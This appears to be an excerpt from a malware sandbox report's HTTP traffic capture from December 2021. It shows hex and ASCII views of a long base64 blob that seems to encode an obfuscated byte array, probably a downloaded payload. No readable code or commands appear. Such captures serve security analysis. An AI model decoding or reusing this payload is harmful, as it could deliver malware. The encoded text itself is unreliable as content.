                                                                Data Ascii: xgNkYsYDM2LGBBRixgN0YsYDQyLGBBRixgRkYsYEVELGA5RCxgRDcsYDdGLGAwMSxgNUUsYEZGLGA2RCxgRkUsYEJELGBCRixgRjAsYEVGLGA0OSxgOUIsYDNGLGBGRixgREYsYEI5LGBGNCxgQzcsYDNELGBBMyxgRjksYERBLGBCMixgRjMsYDM1LGBBMyxgQUMsYDUyLGBFNyxgRDUsYEZGLGAxNCxgMDEsYEUxLGAyRixgRkUsYEU5LGBER
                                                                2021-12-02 20:47:22 UTC32INData Raw: 7a 4c 47 42 44 52 53 78 67 4f 55 49 73 59 44 64 47 4c 47 41 77 51 69 78 67 52 45 55 73 59 45 5a 44 4c 47 41 31 51 69 78 67 52 6b 55 73 59 44 67 7a 4c 47 42 46 52 69 78 67 52 6b 55 73 59 44 49 7a 4c 47 42 46 4f 53 78 67 4e 55 59 73 59 45 59 79 4c 47 42 45 4e 79 78 67 4e 30 4d 73 59 45 5a 43 4c 47 42 43 4e 79 78 67 52 6a 51 73 59 45 52 47 4c 47 42 47 51 79 78 67 4e 44 4d 73 59 44 67 35 4c 47 42 45 4e 69 78 67 4f 55 59 73 59 45 51 33 4c 47 42 43 52 69 78 67 51 6b 59 73 59 45 4a 46 4c 47 42 47 51 53 78 67 4f 44 63 73 59 44 55 79 4c 47 41 34 4d 69 78 67 51 54 67 73 59 45 59 7a 4c 47 42 46 51 53 78 67 4d 54 55 73 59 44 56 46 4c 47 42 47 52 43 78 67 4d 7a 55 73 59 45 5a 47 4c 47 42 45 4f 53 78 67 4f 54 63 73 59 45 59 33 4c 47 42 45 4d 69 78 67 51 6b 59 73 59 45
                                                                Data Ascii: zLGBDRSxgOUIsYDdGLGAwQixgREUsYEZDLGA1QixgRkUsYDgzLGBFRixgRkUsYDIzLGBFOSxgNUYsYEYyLGBENyxgN0MsYEZCLGBCNyxgRjQsYERGLGBGQyxgNDMsYDg5LGBENixgOUYsYEQ3LGBCRixgQkYsYEJFLGBGQSxgODcsYDUyLGA4MixgQTgsYEYzLGBFQSxgMTUsYDVFLGBGRCxgMzUsYEZGLGBEOSxgOTcsYEY3LGBEMixgQkYsYE
                                                                2021-12-02 20:47:22 UTC33INData Raw: 52 6b 59 73 59 45 4d 7a 4c 47 41 33 52 69 78 67 52 6b 4d 73 59 44 52 47 4c 47 41 77 52 53 78 67 4e 7a 41 73 59 45 5a 46 4c 47 41 78 4d 79 78 67 4f 44 67 73 59 45 49 7a 4c 47 41 33 52 53 78 67 4f 54 63 73 59 45 52 47 4c 47 42 45 51 53 78 67 52 6a 45 73 59 45 4d 32 4c 47 41 35 52 69 78 67 4e 44 41 73 59 44 4d 34 4c 47 42 47 52 69 78 67 52 45 45 73 59 45 4a 47 4c 47 41 30 4d 53 78 67 52 6a 67 73 59 45 5a 42 4c 47 42 43 52 69 78 67 4f 44 51 73 59 44 63 34 4c 47 42 47 4e 53 78 67 4d 7a 63 73 59 44 55 35 4c 47 41 33 52 69 78 67 52 6a 51 73 59 44 64 47 4c 47 42 42 4e 69 78 67 51 6b 59 73 59 45 56 43 4c 47 41 33 52 69 78 67 52 6b 4d 73 59 45 49 78 4c 47 42 43 52 69 78 67 4d 44 51 73 59 45 59 78 4c 47 41 33 52 69 78 67 52 6b 51 73 59 44 49 32 4c 47 42 43 52 69 78
                                                                Data Ascii: RkYsYEMzLGA3RixgRkMsYDRGLGAwRSxgNzAsYEZFLGAxMyxgODgsYEIzLGA3RSxgOTcsYERGLGBEQSxgRjEsYEM2LGA5RixgNDAsYDM4LGBGRixgREEsYEJGLGA0MSxgRjgsYEZBLGBCRixgODQsYDc4LGBGNSxgMzcsYDU5LGA3RixgRjQsYDdGLGBBNixgQkYsYEVCLGA3RixgRkMsYEIxLGBCRixgMDQsYEYxLGA3RixgRkQsYDI2LGBCRix
                                                                2021-12-02 20:47:22 UTC34INData Raw: 47 42 45 52 69 78 67 4f 54 63 73 59 44 56 46 4c 47 42 47 52 69 78 67 4f 55 49 73 59 44 4e 43 4c 47 42 42 52 69 78 67 52 6b 59 73 59 44 5a 46 4c 47 41 33 4f 43 78 67 52 6b 51 73 59 45 4a 47 4c 47 42 47 51 53 78 67 51 55 51 73 59 44 64 47 4c 47 42 42 4e 79 78 67 52 6b 59 73 59 44 4a 42 4c 47 41 33 52 43 78 67 4d 7a 63 73 59 45 5a 47 4c 47 41 34 52 43 78 67 52 6b 4d 73 59 44 41 30 4c 47 42 46 52 69 78 67 52 6b 59 73 59 45 59 31 4c 47 41 35 51 69 78 67 52 6b 4d 73 59 45 45 78 4c 47 41 79 4d 43 78 67 4f 54 6b 73 59 45 51 33 4c 47 42 47 51 69 78 67 4d 55 59 73 59 44 52 42 4c 47 42 42 52 69 78 67 52 6b 59 73 59 45 51 7a 4c 47 41 35 52 43 78 67 52 44 63 73 59 45 5a 47 4c 47 41 33 4d 79 78 67 51 7a 51 73 59 44 6c 43 4c 47 42 47 52 69 78 67 52 6b 45 73 59 44 46 47
                                                                Data Ascii: GBERixgOTcsYDVFLGBGRixgOUIsYDNCLGBBRixgRkYsYDZFLGA3OCxgRkQsYEJGLGBGQSxgQUQsYDdGLGBBNyxgRkYsYDJBLGA3RCxgMzcsYEZGLGA4RCxgRkMsYDA0LGBFRixgRkYsYEY1LGA5QixgRkMsYEExLGAyMCxgOTksYEQ3LGBGQixgMUYsYDRBLGBBRixgRkYsYEQzLGA5RCxgRDcsYEZGLGA3MyxgQzQsYDlCLGBGRixgRkEsYDFG
                                                                2021-12-02 20:47:22 UTC36INData Raw: 51 73 59 45 51 78 4c 47 42 46 4f 53 78 67 4e 55 59 73 59 45 5a 47 4c 47 41 7a 4e 79 78 67 52 6b 51 73 59 44 49 78 4c 47 41 33 52 69 78 67 4f 45 4d 73 59 45 5a 47 4c 47 42 46 51 53 78 67 4d 44 55 73 59 45 4a 45 4c 47 42 47 51 53 78 67 4f 44 6b 73 59 44 55 78 4c 47 42 47 4f 43 78 67 51 6b 59 73 59 45 59 35 4c 47 41 77 4e 53 78 67 4d 6b 51 73 59 45 56 43 4c 47 41 33 4e 53 78 67 4e 55 55 73 59 44 64 45 4c 47 41 34 51 79 78 67 4e 54 63 73 59 44 64 47 4c 47 42 42 52 43 78 67 52 54 59 73 59 45 4e 47 4c 47 42 47 4f 53 78 67 4f 55 59 73 59 45 51 7a 4c 47 42 46 52 69 78 67 52 6b 51 73 59 45 51 32 4c 47 42 47 52 69 78 67 52 45 45 73 59 45 59 33 4c 47 42 47 51 79 78 67 4e 54 63 73 59 44 52 47 4c 47 42 46 4f 53 78 67 52 44 55 73 59 44 46 47 4c 47 42 42 51 69 78 67 52
                                                                Data Ascii: QsYEQxLGBFOSxgNUYsYEZGLGAzNyxgRkQsYDIxLGA3RixgOEMsYEZGLGBFQSxgMDUsYEJELGBGQSxgODksYDUxLGBGOCxgQkYsYEY5LGAwNSxgMkQsYEVCLGA3NSxgNUUsYDdELGA4QyxgNTcsYDdGLGBBRCxgRTYsYENGLGBGOSxgOUYsYEQzLGBFRixgRkQsYEQ2LGBGRixgREEsYEY3LGBGQyxgNTcsYDRGLGBFOSxgRDUsYDFGLGBBQixgR
                                                                2021-12-02 20:47:22 UTC37INData Raw: 47 4e 69 78 67 4e 55 59 73 59 44 51 32 4c 47 41 32 52 69 78 67 52 6b 59 73 59 45 46 46 4c 47 41 35 52 43 78 67 51 6a 63 73 59 45 5a 47 4c 47 41 31 4e 43 78 67 51 6b 4d 73 59 45 5a 45 4c 47 42 47 4e 79 78 67 52 6b 59 73 59 44 64 46 4c 47 41 33 52 69 78 67 52 54 67 73 59 44 6c 47 4c 47 41 35 4f 43 78 67 52 6b 55 73 59 44 42 47 4c 47 42 47 52 69 78 67 51 7a 63 73 59 44 46 47 4c 47 42 47 52 69 78 67 4e 6a 55 73 59 45 59 77 4c 47 42 47 4e 69 78 67 4d 30 59 73 59 44 41 78 4c 47 42 43 51 69 78 67 52 6b 4d 73 59 45 4a 43 4c 47 42 45 4e 53 78 67 4d 45 59 73 59 45 4e 45 4c 47 42 46 51 69 78 67 52 6b 59 73 59 44 41 30 4c 47 42 43 52 43 78 67 52 6b 55 73 59 44 55 35 4c 47 42 46 4e 79 78 67 52 6a 55 73 59 44 4d 33 4c 47 41 33 4f 43 78 67 4d 30 51 73 59 45 52 43 4c 47
                                                                Data Ascii: GNixgNUYsYDQ2LGA2RixgRkYsYEFFLGA5RCxgQjcsYEZGLGA1NCxgQkMsYEZELGBGNyxgRkYsYDdFLGA3RixgRTgsYDlGLGA5OCxgRkUsYDBGLGBGRixgQzcsYDFGLGBGRixgNjUsYEYwLGBGNixgM0YsYDAxLGBCQixgRkMsYEJCLGBENSxgMEYsYENELGBFQixgRkYsYDA0LGBCRCxgRkUsYDU5LGBFNyxgRjUsYDM3LGA3OCxgM0QsYERCLG
                                                                2021-12-02 20:47:22 UTC38INData Raw: 59 45 51 35 4c 47 42 47 4d 79 78 67 4e 55 59 73 59 44 49 77 4c 47 41 77 4d 53 78 67 4e 7a 6b 73 59 44 59 34 4c 47 41 7a 4d 43 78 67 52 6b 59 73 59 45 4e 45 4c 47 42 47 52 69 78 67 4d 44 55 73 59 45 4e 42 4c 47 41 33 4f 53 78 67 4e 7a 63 73 59 44 56 46 4c 47 42 47 52 43 78 67 51 30 49 73 59 45 59 78 4c 47 42 46 51 53 78 67 4f 55 59 73 59 45 5a 43 4c 47 41 77 4e 79 78 67 52 6b 59 73 59 45 51 30 4c 47 41 7a 52 69 78 67 4f 54 59 73 59 45 5a 46 4c 47 42 45 4d 79 78 67 4e 30 59 73 59 45 4e 43 4c 47 41 30 52 69 78 67 52 6b 51 73 59 44 55 31 4c 47 41 30 4d 53 78 67 51 30 59 73 59 45 5a 47 4c 47 41 79 4f 43 78 67 4f 44 59 73 59 45 5a 45 4c 47 42 43 51 69 78 67 4d 55 45 73 59 44 63 31 4c 47 42 47 4d 43 78 67 4e 30 59 73 59 45 5a 45 4c 47 41 30 4e 69 78 67 52 6b 59
                                                                Data Ascii: YEQ5LGBGMyxgNUYsYDIwLGAwMSxgNzksYDY4LGAzMCxgRkYsYENELGBGRixgMDUsYENBLGA3OSxgNzcsYDVFLGBGRCxgQ0IsYEYxLGBFQSxgOUYsYEZCLGAwNyxgRkYsYEQ0LGAzRixgOTYsYEZFLGBEMyxgN0YsYENCLGA0RixgRkQsYDU1LGA0MSxgQ0YsYEZGLGAyOCxgODYsYEZELGBCQixgMUEsYDc1LGBGMCxgN0YsYEZELGA0NixgRkY
                                                                2021-12-02 20:47:22 UTC40INData Raw: 43 78 67 52 55 51 73 59 45 5a 47 4c 47 42 46 4e 69 78 67 52 44 63 73 59 45 5a 46 4c 47 41 79 51 69 78 67 4e 55 59 73 59 45 45 32 4c 47 41 33 52 69 78 67 52 55 49 73 59 45 55 7a 4c 47 42 45 52 69 78 67 52 6a 41 73 59 45 59 33 4c 47 42 47 4e 79 78 67 4d 30 49 73 59 45 5a 46 4c 47 42 45 4e 79 78 67 4e 6a 6b 73 59 44 6b 32 4c 47 41 33 52 69 78 67 4e 45 59 73 59 45 46 43 4c 47 41 33 51 79 78 67 52 6b 59 73 59 45 59 31 4c 47 41 35 52 69 78 67 51 55 45 73 59 45 5a 47 4c 47 42 45 4e 43 78 67 51 30 55 73 59 45 46 43 4c 47 42 47 52 69 78 67 4d 6a 41 73 59 44 56 46 4c 47 42 47 52 43 78 67 4e 7a 55 73 59 45 5a 47 4c 47 42 45 52 53 78 67 51 6a 4d 73 59 45 52 47 4c 47 41 79 52 43 78 67 52 6b 51 73 59 45 52 45 4c 47 42 47 52 53 78 67 51 54 59 73 59 45 4a 47 4c 47 41 7a
                                                                Data Ascii: CxgRUQsYEZGLGBFNixgRDcsYEZFLGAyQixgNUYsYEE2LGA3RixgRUIsYEUzLGBERixgRjAsYEY3LGBGNyxgM0IsYEZFLGBENyxgNjksYDk2LGA3RixgNEYsYEFCLGA3QyxgRkYsYEY1LGA5RixgQUEsYEZGLGBENCxgQ0UsYEFCLGBGRixgMjAsYDVFLGBGRCxgNzUsYEZGLGBERSxgQjMsYERGLGAyRCxgRkQsYERELGBGRSxgQTYsYEJGLGAz
                                                                2021-12-02 20:47:22 UTC41INData Raw: 56 42 4c 47 41 78 4e 43 78 67 51 7a 45 73 59 44 4d 7a 4c 47 41 32 4f 43 78 67 51 30 59 73 59 45 4e 46 4c 47 42 46 51 69 78 67 51 6b 59 73 59 44 42 45 4c 47 41 31 52 53 78 67 4f 55 59 73 59 45 5a 47 4c 47 41 30 52 43 78 67 4f 45 59 73 59 44 64 46 4c 47 41 79 51 79 78 67 4e 55 51 73 59 45 5a 44 4c 47 42 45 4e 79 78 67 51 6b 59 73 59 45 4d 30 4c 47 41 31 51 69 78 67 52 6b 59 73 59 45 59 34 4c 47 42 43 52 43 78 67 4e 30 59 73 59 45 4e 43 4c 47 41 7a 52 69 78 67 4f 54 49 73 59 44 51 34 4c 47 42 47 52 43 78 67 4e 30 49 73 59 44 45 35 4c 47 41 78 4e 53 78 67 52 6a 59 73 59 44 6c 43 4c 47 42 47 52 69 78 67 4f 54 45 73 59 44 4e 47 4c 47 41 31 4e 53 78 67 52 6b 59 73 59 44 51 30 4c 47 42 46 4e 79 78 67 52 44 55 73 59 44 64 47 4c 47 42 47 4e 79 78 67 51 6b 59 73 59
                                                                Data Ascii: VBLGAxNCxgQzEsYDMzLGA2OCxgQ0YsYENFLGBFQixgQkYsYDBELGA1RSxgOUYsYEZGLGA0RCxgOEYsYDdFLGAyQyxgNUQsYEZDLGBENyxgQkYsYEM0LGA1QixgRkYsYEY4LGBCRCxgN0YsYENCLGAzRixgOTIsYDQ4LGBGRCxgN0IsYDE5LGAxNSxgRjYsYDlCLGBGRixgOTEsYDNGLGA1NSxgRkYsYDQ0LGBFNyxgRDUsYDdGLGBGNyxgQkYsY
                                                                2021-12-02 20:47:22 UTC42INData Raw: 67 51 6a 55 73 59 45 56 47 4c 47 41 33 51 53 78 67 52 55 49 73 59 45 45 34 4c 47 42 43 52 69 78 67 52 6a 63 73 59 44 5a 47 4c 47 42 47 4f 53 78 67 52 6a 51 73 59 44 4d 33 4c 47 42 47 52 69 78 67 4f 45 51 73 59 44 6c 45 4c 47 41 34 4e 53 78 67 4e 30 49 73 59 44 52 42 4c 47 41 34 51 69 78 67 4d 6a 4d 73 59 44 6c 45 4c 47 41 7a 4e 79 78 67 4d 45 59 73 59 45 59 77 4c 47 42 46 4e 69 78 67 4d 30 59 73 59 45 5a 42 4c 47 42 45 4e 79 78 67 52 6b 59 73 59 44 52 46 4c 47 42 45 52 69 78 67 4e 45 49 73 59 44 56 47 4c 47 42 43 51 79 78 67 52 6b 55 73 59 45 55 31 4c 47 42 43 52 69 78 67 4f 44 63 73 59 45 5a 47 4c 47 42 46 4e 69 78 67 51 55 59 73 59 44 49 32 4c 47 42 45 4e 53 78 67 4e 6a 45 73 59 44 67 7a 4c 47 41 35 51 53 78 67 52 45 59 73 59 45 5a 44 4c 47 41 31 4e 79
                                                                Data Ascii: gQjUsYEVGLGA3QSxgRUIsYEE4LGBCRixgRjcsYDZGLGBGOSxgRjQsYDM3LGBGRixgOEQsYDlELGA4NSxgN0IsYDRBLGA4QixgMjMsYDlELGAzNyxgMEYsYEYwLGBFNixgM0YsYEZBLGBENyxgRkYsYDRFLGBERixgNEIsYDVGLGBCQyxgRkUsYEU1LGBCRixgODcsYEZGLGBFNixgQUYsYDI2LGBENSxgNjEsYDgzLGA5QSxgREYsYEZDLGA1Ny
                                                                2021-12-02 20:47:22 UTC44INData Raw: 4c 47 42 43 4f 53 78 67 52 6a 4d 73 59 45 55 32 4c 47 41 35 52 69 78 67 4f 44 59 73 59 44 4d 33 4c 47 42 47 52 69 78 67 51 30 59 73 59 45 4a 47 4c 47 42 46 4f 43 78 67 52 55 59 73 59 45 5a 45 4c 47 42 46 4d 79 78 67 52 44 49 73 59 45 59 79 4c 47 41 79 52 69 78 67 52 6b 59 73 59 45 56 43 4c 47 41 30 4e 69 78 67 4e 44 45 73 59 45 4d 33 4c 47 42 43 52 69 78 67 4d 7a 4d 73 59 44 4e 42 4c 47 41 33 52 53 78 67 52 54 41 73 59 44 41 30 4c 47 42 47 4f 43 78 67 4e 7a 63 73 59 44 67 32 4c 47 42 42 52 53 78 67 52 55 4d 73 59 45 4a 44 4c 47 42 47 52 53 78 67 4d 54 55 73 59 44 56 46 4c 47 42 47 52 69 78 67 4e 30 51 73 59 45 5a 46 4c 47 42 46 4f 43 78 67 4e 55 59 73 59 45 59 79 4c 47 42 45 52 69 78 67 51 54 51 73 59 45 5a 47 4c 47 41 30 4e 43 78 67 52 6a 4d 73 59 44 52
                                                                Data Ascii: LGBCOSxgRjMsYEU2LGA5RixgODYsYDM3LGBGRixgQ0YsYEJGLGBFOCxgRUYsYEZELGBFMyxgRDIsYEYyLGAyRixgRkYsYEVCLGA0NixgNDEsYEM3LGBCRixgMzMsYDNBLGA3RSxgRTAsYDA0LGBGOCxgNzcsYDg2LGBBRSxgRUMsYEJDLGBGRSxgMTUsYDVFLGBGRixgN0QsYEZFLGBFOCxgNUYsYEYyLGBERixgQTQsYEZGLGA0NCxgRjMsYDR
                                                                2021-12-02 20:47:22 UTC45INData Raw: 6b 55 73 59 45 56 43 4c 47 42 46 4f 53 78 67 4e 6b 59 73 59 45 59 31 4c 47 41 34 51 69 78 67 4e 30 59 73 59 45 4a 47 4c 47 41 79 4d 43 78 67 4d 6a 51 73 59 44 63 34 4c 47 41 30 52 53 78 67 4f 55 51 73 59 45 5a 46 4c 47 41 32 4e 69 78 67 4e 7a 59 73 59 44 67 79 4c 47 41 35 52 69 78 67 4e 54 4d 73 59 44 6b 77 4c 47 42 45 52 43 78 67 4e 7a 6b 73 59 45 59 31 4c 47 41 32 52 69 78 67 51 7a 55 73 59 45 46 43 4c 47 41 78 52 69 78 67 52 6b 51 73 59 44 52 45 4c 47 41 32 52 69 78 67 52 6b 59 73 59 45 5a 45 4c 47 42 47 4e 43 78 67 52 45 55 73 59 45 4a 45 4c 47 41 33 52 69 78 67 4d 30 59 73 59 45 59 30 4c 47 41 78 51 79 78 67 4d 6b 55 73 59 44 59 78 4c 47 41 78 51 53 78 67 4e 30 55 73 59 45 45 78 4c 47 42 44 51 69 78 67 4f 44 63 73 59 44 56 44 4c 47 41 78 4d 69 78 67
                                                                Data Ascii: kUsYEVCLGBFOSxgNkYsYEY1LGA4QixgN0YsYEJGLGAyMCxgMjQsYDc4LGA0RSxgOUQsYEZFLGA2NixgNzYsYDgyLGA5RixgNTMsYDkwLGBERCxgNzksYEY1LGA2RixgQzUsYEFCLGAxRixgRkQsYDRELGA2RixgRkYsYEZELGBGNCxgREUsYEJELGA3RixgM0YsYEY0LGAxQyxgMkUsYDYxLGAxQSxgN0UsYEExLGBDQixgODcsYDVDLGAxMixg
                                                                2021-12-02 20:47:22 UTC46INData Raw: 42 47 4e 43 78 67 52 6a 59 73 59 45 5a 47 4c 47 42 45 4f 43 78 67 4e 7a 6b 73 59 45 5a 43 4c 47 42 45 4e 79 78 67 51 7a 41 73 59 45 52 43 4c 47 42 44 52 69 78 67 52 6b 55 73 59 44 67 77 4c 47 41 7a 52 69 78 67 52 54 6b 73 59 45 59 33 4c 47 41 30 51 79 78 67 4e 30 59 73 59 45 46 43 4c 47 41 35 52 69 78 67 52 6b 45 73 59 44 49 7a 4c 47 41 78 52 53 78 67 4d 44 59 73 59 44 5a 47 4c 47 42 47 52 69 78 67 4f 44 6b 73 59 45 55 34 4c 47 42 47 51 79 78 67 51 6a 63 73 59 44 63 78 4c 47 41 31 4d 69 78 67 52 6a 55 73 59 44 49 33 4c 47 41 79 4d 69 78 67 4d 55 55 73 59 45 5a 42 4c 47 41 30 52 43 78 67 51 7a 4d 73 59 45 51 33 4c 47 42 47 52 69 78 67 52 54 45 73 59 45 5a 47 4c 47 41 78 4f 43 78 67 4d 45 45 73 59 45 59 77 4c 47 42 45 4e 79 78 67 52 6a 67 73 59 44 64 45 4c
                                                                Data Ascii: BGNCxgRjYsYEZGLGBEOCxgNzksYEZCLGBENyxgQzAsYERCLGBDRixgRkUsYDgwLGAzRixgRTksYEY3LGA0QyxgN0YsYEFCLGA5RixgRkEsYDIzLGAxRSxgMDYsYDZGLGBGRixgODksYEU4LGBGQyxgQjcsYDcxLGA1MixgRjUsYDI3LGAyMixgMUUsYEZBLGA0RCxgQzMsYEQ3LGBGRixgRTEsYEZGLGAxOCxgMEEsYEYwLGBENyxgRjgsYDdEL
                                                                2021-12-02 20:47:22 UTC48INData Raw: 73 59 44 45 34 4c 47 42 47 4e 43 78 67 52 6b 4d 73 59 44 4d 33 4c 47 42 42 4d 53 78 67 52 54 63 73 59 45 52 47 4c 47 42 44 4e 43 78 67 51 6b 4d 73 59 45 5a 44 4c 47 41 33 52 69 78 67 52 6b 51 73 59 44 51 32 4c 47 41 33 52 69 78 67 4d 54 4d 73 59 45 59 31 4c 47 42 47 51 79 78 67 4f 54 63 73 59 44 63 32 4c 47 41 31 52 53 78 67 52 6b 59 73 59 45 56 45 4c 47 42 47 4d 53 78 67 52 6b 45 73 59 44 68 47 4c 47 42 43 52 43 78 67 52 6b 49 73 59 44 4e 43 4c 47 42 47 52 53 78 67 52 44 63 73 59 45 59 30 4c 47 41 30 52 69 78 67 52 6b 59 73 59 45 5a 45 4c 47 42 44 51 69 78 67 4d 6a 41 73 59 44 4d 78 4c 47 42 47 4d 53 78 67 4d 44 63 73 59 44 55 77 4c 47 42 44 52 69 78 67 51 6b 59 73 59 44 56 43 4c 47 42 47 52 43 78 67 4e 7a 63 73 59 44 5a 43 4c 47 42 44 52 69 78 67 4e 30
                                                                Data Ascii: sYDE4LGBGNCxgRkMsYDM3LGBBMSxgRTcsYERGLGBDNCxgQkMsYEZDLGA3RixgRkQsYDQ2LGA3RixgMTMsYEY1LGBGQyxgOTcsYDc2LGA1RSxgRkYsYEVELGBGMSxgRkEsYDhGLGBCRCxgRkIsYDNCLGBGRSxgRDcsYEY0LGA0RixgRkYsYEZELGBDQixgMjAsYDMxLGBGMSxgMDcsYDUwLGBDRixgQkYsYDVCLGBGRCxgNzcsYDZCLGBDRixgN0
                                                                2021-12-02 20:47:22 UTC49INData Raw: 52 43 78 67 4d 44 63 73 59 45 5a 47 4c 47 41 31 4d 79 78 67 52 6b 45 73 59 45 52 43 4c 47 42 47 52 53 78 67 4f 54 59 73 59 45 5a 47 4c 47 42 42 4e 69 78 67 4e 6b 59 73 59 44 6b 30 4c 47 41 33 52 69 78 67 51 30 49 73 59 45 4a 47 4c 47 41 34 51 79 78 67 4e 30 45 73 59 45 49 31 4c 47 42 43 4d 69 78 67 52 6a 41 73 59 44 6c 43 4c 47 42 47 52 69 78 67 4e 6a 55 73 59 44 4e 47 4c 47 41 31 4e 53 78 67 52 6b 59 73 59 44 4e 46 4c 47 41 35 52 43 78 67 4e 54 63 73 59 44 4e 47 4c 47 42 44 4d 79 78 67 51 55 49 73 59 45 4a 47 4c 47 42 47 4e 43 78 67 4d 30 59 73 59 45 5a 47 4c 47 41 79 52 69 78 67 4e 30 55 73 59 45 5a 47 4c 47 42 47 4e 43 78 67 4e 45 59 73 59 45 5a 42 4c 47 42 46 4d 69 78 67 4d 7a 63 73 59 45 5a 46 4c 47 41 35 52 43 78 67 4f 44 4d 73 59 45 59 78 4c 47 42
                                                                Data Ascii: RCxgMDcsYEZGLGA1MyxgRkEsYERCLGBGRSxgOTYsYEZGLGBBNixgNkYsYDk0LGA3RixgQ0IsYEJGLGA4QyxgN0EsYEI1LGBCMixgRjAsYDlCLGBGRixgNjUsYDNGLGA1NSxgRkYsYDNFLGA5RCxgNTcsYDNGLGBDMyxgQUIsYEJGLGBGNCxgM0YsYEZGLGAyRixgN0UsYEZGLGBGNCxgNEYsYEZBLGBFMixgMzcsYEZFLGA5RCxgODMsYEYxLGB
                                                                2021-12-02 20:47:22 UTC50INData Raw: 44 52 47 4c 47 42 45 4e 53 78 67 51 6b 59 73 59 45 46 42 4c 47 42 47 4d 79 78 67 52 55 45 73 59 44 6c 47 4c 47 41 34 4e 69 78 67 4e 54 63 73 59 45 49 7a 4c 47 41 33 52 69 78 67 52 55 59 73 59 45 52 47 4c 47 42 47 52 53 78 67 4d 7a 51 73 59 45 5a 45 4c 47 42 45 52 69 78 67 51 6b 59 73 59 45 59 34 4c 47 41 34 52 43 78 67 52 6b 55 73 59 44 67 7a 4c 47 41 34 4d 43 78 67 4e 54 51 73 59 45 4a 47 4c 47 41 79 4e 53 78 67 4e 44 67 73 59 45 49 31 4c 47 42 46 52 43 78 67 4f 54 59 73 59 45 51 78 4c 47 41 33 52 53 78 67 4e 45 49 73 59 44 49 79 4c 47 42 45 4e 53 78 67 4e 6b 59 73 59 45 5a 44 4c 47 41 35 51 69 78 67 4f 44 63 73 59 45 46 47 4c 47 41 33 52 69 78 67 4f 44 55 73 59 45 51 33 4c 47 41 30 4e 79 78 67 4e 30 59 73 59 45 56 42 4c 47 41 7a 52 69 78 67 52 6a 59 73
                                                                Data Ascii: DRGLGBENSxgQkYsYEFBLGBGMyxgRUEsYDlGLGA4NixgNTcsYEIzLGA3RixgRUYsYERGLGBGRSxgMzQsYEZELGBERixgQkYsYEY4LGA4RCxgRkUsYDgzLGA4MCxgNTQsYEJGLGAyNSxgNDgsYEI1LGBFRCxgOTYsYEQxLGA3RSxgNEIsYDIyLGBENSxgNkYsYEZDLGA5QixgODcsYEFGLGA3RixgODUsYEQ3LGA0NyxgN0YsYEVBLGAzRixgRjYs
                                                                2021-12-02 20:47:22 UTC52INData Raw: 78 67 4d 30 45 73 59 44 49 79 4c 47 41 79 4e 53 78 67 52 54 51 73 59 44 6b 32 4c 47 41 30 51 79 78 67 4e 44 63 73 59 44 6b 30 4c 47 41 33 4e 69 78 67 52 55 45 73 59 45 4a 44 4c 47 42 47 51 53 78 67 4e 54 63 73 59 45 55 78 4c 47 42 45 4e 53 78 67 4e 30 59 73 59 45 55 79 4c 47 42 43 4e 79 78 67 4f 54 6b 73 59 45 5a 44 4c 47 42 43 51 53 78 67 52 54 6b 73 59 44 6b 7a 4c 47 42 45 52 69 78 67 52 6b 49 73 59 45 46 47 4c 47 42 47 4f 53 78 67 4d 45 59 73 59 45 5a 45 4c 47 41 31 4e 79 78 67 52 54 63 73 59 44 4d 30 4c 47 41 31 4f 53 78 67 4d 6a 4d 73 59 44 46 43 4c 47 41 78 4f 53 78 67 51 30 4d 73 59 44 49 35 4c 47 41 33 52 53 78 67 52 55 45 73 59 45 4a 44 4c 47 42 43 51 53 78 67 51 7a 41 73 59 45 46 43 4c 47 42 47 52 69 78 67 52 6a 67 73 59 44 49 33 4c 47 42 43 52
                                                                Data Ascii: xgM0EsYDIyLGAyNSxgRTQsYDk2LGA0QyxgNDcsYDk0LGA3NixgRUEsYEJDLGBGQSxgNTcsYEUxLGBENSxgN0YsYEUyLGBCNyxgOTksYEZDLGBCQSxgRTksYDkzLGBERixgRkIsYEFGLGBGOSxgMEYsYEZELGA1NyxgRTcsYDM0LGA1OSxgMjMsYDFCLGAxOSxgQ0MsYDI5LGA3RSxgRUEsYEJDLGBCQSxgQzAsYEFCLGBGRixgRjgsYDI3LGBCR
                                                                2021-12-02 20:47:22 UTC53INData Raw: 31 4c 47 42 46 4f 53 78 67 52 55 59 73 59 44 56 44 4c 47 42 47 51 79 78 67 4e 7a 6b 73 59 44 6b 31 4c 47 42 47 52 69 78 67 52 54 59 73 59 44 4e 47 4c 47 41 30 51 79 78 67 4f 44 51 73 59 45 49 32 4c 47 42 45 52 43 78 67 52 6b 55 73 59 45 55 32 4c 47 42 47 52 69 78 67 4d 7a 41 73 59 44 4d 35 4c 47 41 77 4d 69 78 67 4f 55 51 73 59 44 55 33 4c 47 42 47 52 69 78 67 52 54 6b 73 59 44 64 47 4c 47 41 34 51 69 78 67 4e 55 55 73 59 45 5a 45 4c 47 42 44 52 53 78 67 52 45 59 73 59 45 5a 43 4c 47 41 34 4e 79 78 67 4e 30 59 73 59 44 4e 43 4c 47 42 47 52 43 78 67 4e 6b 59 73 59 44 51 32 4c 47 42 47 52 69 78 67 4e 45 45 73 59 45 55 34 4c 47 41 32 51 69 78 67 4d 30 55 73 59 44 49 32 4c 47 41 35 52 53 78 67 52 6b 4d 73 59 44 46 45 4c 47 41 31 52 43 78 67 4d 44 67 73 59 45
                                                                Data Ascii: 1LGBFOSxgRUYsYDVDLGBGQyxgNzksYDk1LGBGRixgRTYsYDNGLGA0QyxgODQsYEI2LGBERCxgRkUsYEU2LGBGRixgMzAsYDM5LGAwMixgOUQsYDU3LGBGRixgRTksYDdGLGA4QixgNUUsYEZELGBDRSxgREYsYEZCLGA4NyxgN0YsYDNCLGBGRCxgNkYsYDQ2LGBGRixgNEEsYEU4LGA2QixgM0UsYDI2LGA5RSxgRkMsYDFELGA1RCxgMDgsYE
